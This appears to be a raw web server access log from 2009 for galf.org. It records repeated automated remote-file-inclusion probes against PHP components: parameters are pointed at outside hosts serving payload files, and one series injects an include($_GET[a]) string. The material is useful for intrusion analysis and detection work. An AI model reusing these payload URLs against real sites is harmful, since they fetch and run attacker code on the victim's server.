203.185.129.36 - - [27/Sep/2009:21:33:36 -0700] "GET /logs/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:21:34:03 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:21:34:03 -0700] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:21:34:03 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [27/Sep/2009:21:34:12 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:34:12 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:34:12 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.206.120.161 - - [27/Sep/2009:21:34:23 -0700] "GET /logs/access_090629.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:34:28 -0700] "GET /logs/access_090406.log%20%20//skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.225.253.135 - - [27/Sep/2009:21:34:28 -0700] "GET /logs/access_090504.log%20%20//skin/zero_vote/login.php?dir=http://ngelitik.org/cyberirc/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:21:34:30 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:34:42 -0700] "GET /logs/access_090629.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:34:51 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.206.120.161 - - [27/Sep/2009:21:35:08 -0700] "GET /logs/access_090601.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:21:35:48 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:21:35:51 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:36:32 -0700] "GET /logs/access_090420.log//skin/zero_vote/setup.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [27/Sep/2009:21:37:25 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:37:25 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:37:25 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
218.27.203.107 - - [27/Sep/2009:21:38:50 -0700] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.27.203.107 - - [27/Sep/2009:21:39:02 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4948 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.88 - - [27/Sep/2009:21:40:08 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /logs/access_090706.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /logs/access_090706.log/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /logs/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.39.182.49 - - [27/Sep/2009:21:40:30 -0700] "GET /logs/http://h1.ripway.com/zreg/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:21:42:30 -0700] "GET /logs/access_090420.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.126.28.131 - - [27/Sep/2009:21:42:42 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:42:42 -0700] "GET /logs/access.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:42:42 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:21:43:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:43:54 -0700] "GET /logs/access_090914.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:43:54 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.126.28.131 - - [27/Sep/2009:21:44:03 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:44:03 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:44:03 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:21:44:34 -0700] "GET /logs/access_090907.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.72.216 - - [27/Sep/2009:21:44:37 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:44:37 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.122.72.216 - - [27/Sep/2009:21:44:37 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.politics.cau.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.207.172.166 - - [27/Sep/2009:21:44:38 -0700] "GET /logs/access.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:21:46:02 -0700] "GET /logs/access_090914.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:46:08 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
8.12.161.82 - - [27/Sep/2009:21:46:48 -0700] "GET /logs/access.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:47:01 -0700] "GET /logs/access_090907.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.126.28.131 - - [27/Sep/2009:21:47:27 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:47:27 -0700] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:47:27 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.207.172.166 - - [27/Sep/2009:21:48:22 -0700] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [27/Sep/2009:21:48:23 -0700] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.207.172.166 - - [27/Sep/2009:21:48:23 -0700] "GET /logs/access_090420.log/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://awem.pcu.ac.kr/bbs/skin/uks_gallery_v3020/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:51:10 -0700] "GET /logs/access_090914.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:51:16 -0700] "GET /logs/access_090420.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [27/Sep/2009:21:51:17 -0700] "GET /logs/access_090420.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:51:20 -0700] "GET /logs/access_090907.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:52:00 -0700] "GET /logs/access_090914.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:52:11 -0700] "GET /logs/access_090907.log%20%20//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:14 -0700] "GET /logs/access_090907.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:14 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:14 -0700] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:14 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:16 -0700] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:16 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.188.106.38 - - [27/Sep/2009:21:52:16 -0700] "GET /logs/access_090907.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:21:54:23 -0700] "GET /logs/access_090309.log//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:21:54:23 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:21:54:23 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:21:54:48 -0700] "GET /logs/access_090223.log//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
193.126.28.131 - - [27/Sep/2009:21:55:33 -0700] "GET /modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:55:36 -0700] "GET /logs/access.log%20%20/modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:55:36 -0700] "GET /logs/modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:57:17 -0700] "GET /logs/access.log/modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:57:17 -0700] "GET /modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
193.126.28.131 - - [27/Sep/2009:21:57:17 -0700] "GET /logs/modules/xgallery/upgrate_album.php?GALLERY_BASEDIR=http://www.pixain.sitebr.net/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
58.184.252.3 - - [27/Sep/2009:21:57:28 -0700] "GET /logs/access_090914.log//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:57:28 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
58.184.252.3 - - [27/Sep/2009:21:57:29 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.partyplans.com.au/forum2/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:57:41 -0700] "GET /logs///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:57:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:57:41 -0700] "GET /logs/access_090706.log%20%20///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:58:19 -0700] "GET /logs/access_090629.log%20%20///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.147.225.158 - - [27/Sep/2009:21:58:45 -0700] "GET /logs/access_090831.log//appserv/main.php?appserv_root=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:21:58:52 -0700] "GET /logs/access.log/error.php?dir=http://rainmaker.co.th/images/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:59:19 -0700] "GET /logs/access_090706.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [27/Sep/2009:21:59:29 -0700] "GET /logs/access_090629.log///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:59:49 -0700] "GET /common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.230.189 - - [27/Sep/2009:21:59:49 -0700] "GET /common/db.php?commonpath=http://iad4151.co.kr/cgi/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:22:00:14 -0700] "GET /logs/access_090309.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.135.134.78 - - [27/Sep/2009:22:00:23 -0700] "GET /logs/access_090223.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.ssp.co.id/admin/admin/id1old?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.88 - - [27/Sep/2009:22:02:51 -0700] "GET /logs/access_090413.log HTTP/1.0" 200 5725136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:01 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:01 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:01 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:04 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:04 -0700] "GET /logs/access.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:04 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:15 -0700] "GET /logs/access_090518.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:15 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:15 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:19 -0700] "GET /logs//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:19 -0700] "GET /logs/access_090518.log%20%20//Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.29.34 - - [27/Sep/2009:22:03:19 -0700] "GET /Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:04:38 -0700] "GET /logs/access_090420.log//modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:04:38 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.12.226 - - [27/Sep/2009:22:04:38 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.ciasoftwares.com/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:22:05:10 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:22:05:10 -0700] "GET /logs/access_090309.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
203.185.129.36 - - [27/Sep/2009:22:05:10 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
87.106.95.46 - - [27/Sep/2009:22:05:11 -0700] "GET /logs/access_090316.log/index.inc.php?REX[INCLUDE_PATH]=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.95.46 - - [27/Sep/2009:22:05:11 -0700] "GET /index.inc.php?REX[INCLUDE_PATH]=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.95.46 - - [27/Sep/2009:22:05:11 -0700] "GET /logs/index.inc.php?REX[INCLUDE_PATH]=http://www.framoss.ru/joomla/mambots/res.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
